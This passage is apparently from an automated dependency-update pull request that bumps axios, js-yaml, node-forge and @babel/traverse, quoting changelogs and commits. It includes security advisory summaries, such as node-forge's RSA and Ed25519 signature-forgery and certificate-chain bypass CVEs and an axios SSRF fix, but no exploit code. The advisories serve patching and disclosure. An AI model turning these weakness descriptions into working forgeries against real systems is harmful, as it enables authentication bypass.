block (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10668\"\u003e#10668\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/363185461b90b1b78845dc8a99a1f103d9b122a1\"\u003e\u003ccode\u003e3631854\u003c/code\u003e\u003c/a\u003e fix: unrestricted cloud metadata exfiltration via header injection chain (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10\"\u003e#10\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/fb3befb6daac6cad26b2e54094d0f2d9e47f24df\"\u003e\u003ccode\u003efb3befb\u003c/code\u003e\u003c/a\u003e fix: no_proxy hostname normalization bypass leads to ssrf (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10661\"\u003e#10661\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/axios/axios/compare/v0.23.0...v1.15.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by [GitHub Actions](\u003ca href=\"https://www.npmjs.com/~GitHub\"\u003ehttps://www.npmjs.com/~GitHub\u003c/a\u003e Actions), a new releaser for axios since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version adds \u003ccode\u003eprepare\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `js-yaml` from 3.14.1 to 3.14.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[3.14.2] - 2025-11-15\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBackported v4.1.1 fix to v3\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.1.0] - 2021-04-15\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eTypes are now exported as \u003ccode\u003eyaml.types.XXX\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eEvery type now has \u003ccode\u003eoptions\u003c/code\u003e property with original arguments kept as they were\n(see \u003ccode\u003eyaml.types.int.options\u003c/code\u003e as an example).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eSchema.extend()\u003c/code\u003e now keeps old type order in case of conflicts\n(e.g. Schema.extend([ a, b, c ]).extend([ b, a, d ]) is now ordered as \u003ccode\u003eabcd\u003c/code\u003e instead of \u003ccode\u003ecbad\u003c/code\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.0.0] - 2021-01-03\u003c/h2\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eCheck \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/migrate_v3_to_v4.md\"\u003emigration guide\u003c/a\u003e to see details for all breaking changes.\u003c/li\u003e\n\u003cli\u003eBreaking: \u0026quot;unsafe\u0026quot; tags \u003ccode\u003e!!js/function\u003c/code\u003e, \u003ccode\u003e!!js/regexp\u003c/code\u003e, \u003ccode\u003e!!js/undefined\u003c/code\u003e are\nmoved to \u003ca href=\"https://github.com/nodeca/js-yaml-js-types\"\u003ejs-yaml-js-types\u003c/a\u003e package.\u003c/li\u003e\n\u003cli\u003eBreaking: removed \u003ccode\u003esafe*\u003c/code\u003e functions. Use \u003ccode\u003eload\u003c/code\u003e, \u003ccode\u003eloadAll\u003c/code\u003e, \u003ccode\u003edump\u003c/code\u003e\ninstead which are all now safe by default.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eyaml.DEFAULT_SAFE_SCHEMA\u003c/code\u003e and \u003ccode\u003eyaml.DEFAULT_FULL_SCHEMA\u003c/code\u003e are removed, use\n\u003ccode\u003eyaml.DEFAULT_SCHEMA\u003c/code\u003e instead.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eyaml.Schema.create(schema, tags)\u003c/code\u003e is removed, use \u003ccode\u003eschema.extend(tags)\u003c/code\u003e instead.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e!!binary\u003c/code\u003e now always mapped to \u003ccode\u003eUint8Array\u003c/code\u003e on load.\u003c/li\u003e\n\u003cli\u003eReduced nesting of \u003ccode\u003e/lib\u003c/code\u003e folder.\u003c/li\u003e\n\u003cli\u003eParse numbers according to YAML 1.2 instead of YAML 1.1 (\u003ccode\u003e01234\u003c/code\u003e is now decimal,\n\u003ccode\u003e0o1234\u003c/code\u003e is octal, \u003ccode\u003e1:23\u003c/code\u003e is parsed as string instead of base60).\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e no longer quotes \u003ccode\u003e:\u003c/code\u003e, \u003ccode\u003e[\u003c/code\u003e, \u003ccode\u003e]\u003c/code\u003e, \u003ccode\u003e(\u003c/code\u003e, \u003ccode\u003e)\u003c/code\u003e except when necessary, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/470\"\u003e#470\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/557\"\u003e#557\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eLine and column in exceptions are now formatted as \u003ccode\u003e(X:Y)\u003c/code\u003e instead of\n\u003ccode\u003eat line X, column Y\u003c/code\u003e (also present in compact format), \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/332\"\u003e#332\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eCode snippet created in exceptions now contains multiple lines with line numbers.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e now serializes \u003ccode\u003eundefined\u003c/code\u003e as \u003ccode\u003enull\u003c/code\u003e in collections and removes keys with\n\u003ccode\u003eundefined\u003c/code\u003e in mappings, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/571\"\u003e#571\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e with \u003ccode\u003eskipInvalid=true\u003c/code\u003e now serializes invalid items in collections as null.\u003c/li\u003e\n\u003cli\u003eCustom tags starting with \u003ccode\u003e!\u003c/code\u003e are now dumped as \u003ccode\u003e!tag\u003c/code\u003e instead of \u003ccode\u003e!\u0026lt;!tag\u0026gt;\u003c/code\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/576\"\u003e#576\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eCustom tags starting with \u003ccode\u003etag:yaml.org,2002:\u003c/code\u003e are now shorthanded using \u003ccode\u003e!!\u003c/code\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/258\"\u003e#258\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded \u003ccode\u003e.mjs\u003c/code\u003e (es modules) support.\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003equotingType\u003c/code\u003e and \u003ccode\u003eforceQuotes\u003c/code\u003e options for dumper to configure\nstring literal style, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/290\"\u003e#290\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/529\"\u003e#529\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003estyles: { '!!null': 'empty' }\u003c/code\u003e option for dumper\n(serializes \u003ccode\u003e{ foo: null }\u003c/code\u003e as \u0026quot;\u003ccode\u003efoo: \u003c/code\u003e\u0026quot;), \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/570\"\u003e#570\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/9963d366dfbde0c69722452bcd40b41e7e4160a0\"\u003e\u003ccode\u003e9963d36\u003c/code\u003e\u003c/a\u003e 3.14.2 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/10d3c8e70a6888543f5cdb656bb39f73e0ea77c1\"\u003e\u003ccode\u003e10d3c8e\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/5278870a17454fe8621dbd8c445c412529525266\"\u003e\u003ccode\u003e5278870\u003c/code\u003e\u003c/a\u003e fix prototype pollution in merge (\u0026lt;\u0026lt;) (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/731\"\u003e#731\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/nodeca/js-yaml/compare/3.14.1...3.14.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `js-yaml` from 4.1.0 to 4.1.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[3.14.2] - 2025-11-15\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBackported v4.1.1 fix to v3\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.1.0] - 2021-04-15\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eTypes are now exported as \u003ccode\u003eyaml.types.XXX\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eEvery type now has \u003ccode\u003eoptions\u003c/code\u003e property with original arguments kept as they were\n(see \u003ccode\u003eyaml.types.int.options\u003c/code\u003e as an example).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eSchema.extend()\u003c/code\u003e now keeps old type order in case of conflicts\n(e.g. Schema.extend([ a, b, c ]).extend([ b, a, d ]) is now ordered as \u003ccode\u003eabcd\u003c/code\u003e instead of \u003ccode\u003ecbad\u003c/code\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.0.0] - 2021-01-03\u003c/h2\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eCheck \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/migrate_v3_to_v4.md\"\u003emigration guide\u003c/a\u003e to see details for all breaking changes.\u003c/li\u003e\n\u003cli\u003eBreaking: \u0026quot;unsafe\u0026quot; tags \u003ccode\u003e!!js/function\u003c/code\u003e, \u003ccode\u003e!!js/regexp\u003c/code\u003e, \u003ccode\u003e!!js/undefined\u003c/code\u003e are\nmoved to \u003ca href=\"https://github.com/nodeca/js-yaml-js-types\"\u003ejs-yaml-js-types\u003c/a\u003e package.\u003c/li\u003e\n\u003cli\u003eBreaking: removed \u003ccode\u003esafe*\u003c/code\u003e functions. Use \u003ccode\u003eload\u003c/code\u003e, \u003ccode\u003eloadAll\u003c/code\u003e, \u003ccode\u003edump\u003c/code\u003e\ninstead which are all now safe by default.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eyaml.DEFAULT_SAFE_SCHEMA\u003c/code\u003e and \u003ccode\u003eyaml.DEFAULT_FULL_SCHEMA\u003c/code\u003e are removed, use\n\u003ccode\u003eyaml.DEFAULT_SCHEMA\u003c/code\u003e instead.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eyaml.Schema.create(schema, tags)\u003c/code\u003e is removed, use \u003ccode\u003eschema.extend(tags)\u003c/code\u003e instead.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e!!binary\u003c/code\u003e now always mapped to \u003ccode\u003eUint8Array\u003c/code\u003e on load.\u003c/li\u003e\n\u003cli\u003eReduced nesting of \u003ccode\u003e/lib\u003c/code\u003e folder.\u003c/li\u003e\n\u003cli\u003eParse numbers according to YAML 1.2 instead of YAML 1.1 (\u003ccode\u003e01234\u003c/code\u003e is now decimal,\n\u003ccode\u003e0o1234\u003c/code\u003e is octal, \u003ccode\u003e1:23\u003c/code\u003e is parsed as string instead of base60).\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e no longer quotes \u003ccode\u003e:\u003c/code\u003e, \u003ccode\u003e[\u003c/code\u003e, \u003ccode\u003e]\u003c/code\u003e, \u003ccode\u003e(\u003c/code\u003e, \u003ccode\u003e)\u003c/code\u003e except when necessary, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/470\"\u003e#470\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/557\"\u003e#557\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eLine and column in exceptions are now formatted as \u003ccode\u003e(X:Y)\u003c/code\u003e instead of\n\u003ccode\u003eat line X, column Y\u003c/code\u003e (also present in compact format), \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/332\"\u003e#332\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eCode snippet created in exceptions now contains multiple lines with line numbers.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e now serializes \u003ccode\u003eundefined\u003c/code\u003e as \u003ccode\u003enull\u003c/code\u003e in collections and removes keys with\n\u003ccode\u003eundefined\u003c/code\u003e in mappings, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/571\"\u003e#571\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e with \u003ccode\u003eskipInvalid=true\u003c/code\u003e now serializes invalid items in collections as null.\u003c/li\u003e\n\u003cli\u003eCustom tags starting with \u003ccode\u003e!\u003c/code\u003e are now dumped as \u003ccode\u003e!tag\u003c/code\u003e instead of \u003ccode\u003e!\u0026lt;!tag\u0026gt;\u003c/code\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/576\"\u003e#576\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eCustom tags starting with \u003ccode\u003etag:yaml.org,2002:\u003c/code\u003e are now shorthanded using \u003ccode\u003e!!\u003c/code\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/258\"\u003e#258\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded \u003ccode\u003e.mjs\u003c/code\u003e (es modules) support.\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003equotingType\u003c/code\u003e and \u003ccode\u003eforceQuotes\u003c/code\u003e options for dumper to configure\nstring literal style, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/290\"\u003e#290\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/529\"\u003e#529\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003estyles: { '!!null': 'empty' }\u003c/code\u003e option for dumper\n(serializes \u003ccode\u003e{ foo: null }\u003c/code\u003e as \u0026quot;\u003ccode\u003efoo: \u003c/code\u003e\u0026quot;), \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/570\"\u003e#570\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/9963d366dfbde0c69722452bcd40b41e7e4160a0\"\u003e\u003ccode\u003e9963d36\u003c/code\u003e\u003c/a\u003e 3.14.2 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/10d3c8e70a6888543f5cdb656bb39f73e0ea77c1\"\u003e\u003ccode\u003e10d3c8e\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/5278870a17454fe8621dbd8c445c412529525266\"\u003e\u003ccode\u003e5278870\u003c/code\u003e\u003c/a\u003e fix prototype pollution in merge (\u0026lt;\u0026lt;) (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/731\"\u003e#731\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/nodeca/js-yaml/compare/3.14.1...3.14.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `node-forge` from 1.3.0 to 1.4.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/digitalbazaar/forge/blob/main/CHANGELOG.md\"\u003enode-forge's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e1.4.0 - 2026-03-24\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eHIGH\u003c/strong\u003e: Denial of Service in \u003ccode\u003eBigInteger.modInverse()\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003eA Denial of Service (DoS) vulnerability exists due to an infinite loop in\nthe \u003ccode\u003eBigInteger.modInverse()\u003c/code\u003e function (inherited from the bundled jsbn\nlibrary). When \u003ccode\u003emodInverse()\u003c/code\u003e is called with a zero value as input, the\ninternal Extended Euclidean Algorithm enters an unreachable exit condition,\ncausing the process to hang indefinitely and consume 100% CPU.\u003c/li\u003e\n\u003cli\u003eReported by Kr0emer.\u003c/li\u003e\n\u003cli\u003eCVE ID: \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2026-33891\"\u003eCVE-2026-33891\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eGHSA ID: \u003ca href=\"https://github.com/digitalbazaar/forge/security/advisories/GHSA-5m6q-g25r-mvwx\"\u003eGHSA-5gfm-wpxj-wjgq\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eHIGH\u003c/strong\u003e: Signature forgery in RSA-PKCS due to ASN.1 extra field.\n\u003cul\u003e\n\u003cli\u003eRSASSA PKCS#1 v1.5 signature verification accepts forged signatures for low\npublic exponent keys (e=3). Attackers can forge signatures by stuffing\n\u0026quot;garbage\u0026quot; bytes within the ASN.1 structure in order to construct a\nsignature that passes verification, enabling Bleichenbacher style forgery.\nThis issue is similar to CVE-2022-24771, but adds bytes in an addition\nfield within the ASN.1 structure, rather than outside of it.\u003c/li\u003e\n\u003cli\u003eAdditionally, forge does not validate that signatures include a minimum of\n8 bytes of padding as defined by the specification, providing attackers\nadditional space to construct Bleichenbacher forgeries.\u003c/li\u003e\n\u003cli\u003eReported as part of a U.C. Berkeley security research project by:\n\u003cul\u003e\n\u003cli\u003eAustin Chu, Sohee Kim, and Corban Villa.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eCVE ID: \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2026-33894\"\u003eCVE-2026-33894\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eGHSA ID: \u003ca href=\"https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp\"\u003eGHSA-ppp5-5v6c-4jwp\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eHIGH\u003c/strong\u003e: Signature forgery in Ed25519 due to missing S \u0026lt; L check.\n\u003cul\u003e\n\u003cli\u003eEd25519 signature verification accepts forged non-canonical signatures\nwhere the scalar S is not reduced modulo the group order (S \u0026gt;= L). A valid\nsignature and its S + L variant both verify in forge, while Node.js\ncrypto.verify (OpenSSL-backed) rejects the S + L variant, as defined by the\nspecification. This class of signature malleability has been exploited in\npractice to bypass authentication and authorization logic (see\nCVE-2026-25793, CVE-2022-35961). Applications relying on signature\nuniqueness (i.e., dedup by signature bytes, replay tracking, signed-object\ncanonicalization checks) may be bypassed.\u003c/li\u003e\n\u003cli\u003eReported as part of a U.C. Berkeley security research project by:\n\u003cul\u003e\n\u003cli\u003eAustin Chu, Sohee Kim, and Corban Villa.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eCVE ID: \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2026-33895\"\u003eCVE-2026-33895\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eGHSA ID: \u003ca href=\"https://github.com/digitalbazaar/forge/security/advisories/GHSA-q67f-28xg-22rw\"\u003eGHSA-q67f-28xg-22rw\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eHIGH\u003c/strong\u003e: \u003ccode\u003ebasicConstraints\u003c/code\u003e bypass in certificate chain verification.\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003epki.verifyCertificateChain()\u003c/code\u003e does not enforce RFC 5280 \u003ccode\u003ebasicConstraints\u003c/code\u003e\nrequirements when an intermediate certificate lacks both the\n\u003ccode\u003ebasicConstraints\u003c/code\u003e and \u003ccode\u003ekeyUsage\u003c/code\u003e extensions. This allows any leaf\ncertificate (without these extensions) to act as a CA and sign other\ncertificates, which node-forge will accept as valid.\u003c/li\u003e\n\u003cli\u003eReported by Doruk Tan Ozturk (\u003ca href=\"https://github.com/peaktwilight\"\u003e\u003ccode\u003e@​peaktwilight\u003c/code\u003e\u003c/a\u003e) - doruk.ch\u003c/li\u003e\n\u003cli\u003eCVE ID: \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2026-33896\"\u003eCVE-2026-33896\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eGHSA ID: \u003ca href=\"https://github.com/digitalbazaar/forge/security/advisories/GHSA-2328-f5f3-gj25\"\u003eGHSA-2328-f5f3-gj25\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/fa385f92440879601240020f158bed68e444e83a\"\u003e\u003ccode\u003efa385f9\u003c/code\u003e\u003c/a\u003e Release 1.4.0.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/07d4e162762ed4fdab5caca9ebf78237fcf85339\"\u003e\u003ccode\u003e07d4e16\u003c/code\u003e\u003c/a\u003e Update changelog.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/cb90fd92091ee34e4abab3ad0c835eeea3d06c3e\"\u003e\u003ccode\u003ecb90fd9\u003c/code\u003e\u003c/a\u003e Update changelog.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/963e7c5c7b0f03de1b28a1e5a42a6bafda4cf711\"\u003e\u003ccode\u003e963e7c5\u003c/code\u003e\u003c/a\u003e Add unit test for \u0026quot;pseudonym\u0026quot;\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/f0b6f5b7c5d1c918240e975e0cade4f47d005446\"\u003e\u003ccode\u003ef0b6f5b\u003c/code\u003e\u003c/a\u003e Add pseudonym OID\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/3df48a311d4b53dc6493b7a47a8d07f3669957d9\"\u003e\u003ccode\u003e3df48a3\u003c/code\u003e\u003c/a\u003e Fix missing CVE ID.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/2e492832fb25227e6b647cbe1ac981c123171e90\"\u003e\u003ccode\u003e2e49283\u003c/code\u003e\u003c/a\u003e Add x509 \u003ccode\u003ebasicConstraints\u003c/code\u003e check.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/bdecf11571c9f1a487cc0fe72fe78ff6dfa96b85\"\u003e\u003ccode\u003ebdecf11\u003c/code\u003e\u003c/a\u003e Add canonical signature scaler check for S \u0026lt; L.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/af094e69c60ac5f7b29f2b1957c53ae5e12fd4a0\"\u003e\u003ccode\u003eaf094e6\u003c/code\u003e\u003c/a\u003e Add RSA padding and DigestInfo length checks.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/796eeb1673f6ec636fda02dfc295047d9f7aefe0\"\u003e\u003ccode\u003e796eeb1\u003c/code\u003e\u003c/a\u003e Improve jsbn fix.\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/digitalbazaar/forge/compare/v1.3.0...v1.4.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@babel/traverse` from 7.14.2 to 7.29.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/babel/babel/releases\"\u003e\u003ccode\u003e@​babel/traverse\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.29.0 (2026-01-31)\u003c/h2\u003e\n\u003cp\u003eThanks \u003ca href=\"https://github.com/simbahax\"\u003e\u003ccode\u003e@​simbahax\u003c/code\u003e\u003c/a\u003e for your first PR!\u003c/p\u003e\n\u003ch4\u003e:rocket: New Feature\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-types\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17750\"\u003e#17750\u003c/a\u003e [7.x backport] Add attributes import declaration builder (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-standalone\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17663\"\u003e#17663\u003c/a\u003e [7.x backport] feat(standalone): export async transform (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17725\"\u003e#17725\u003c/a\u003e [7.x backport] feat: read standalone targets from data-targets (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17765\"\u003e#17765\u003c/a\u003e fix(parser): correctly parse type assertions in \u003ccode\u003eextends\u003c/code\u003e clause (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17723\"\u003e#17723\u003c/a\u003e [7.x backport] fix(parser): improve super type argument 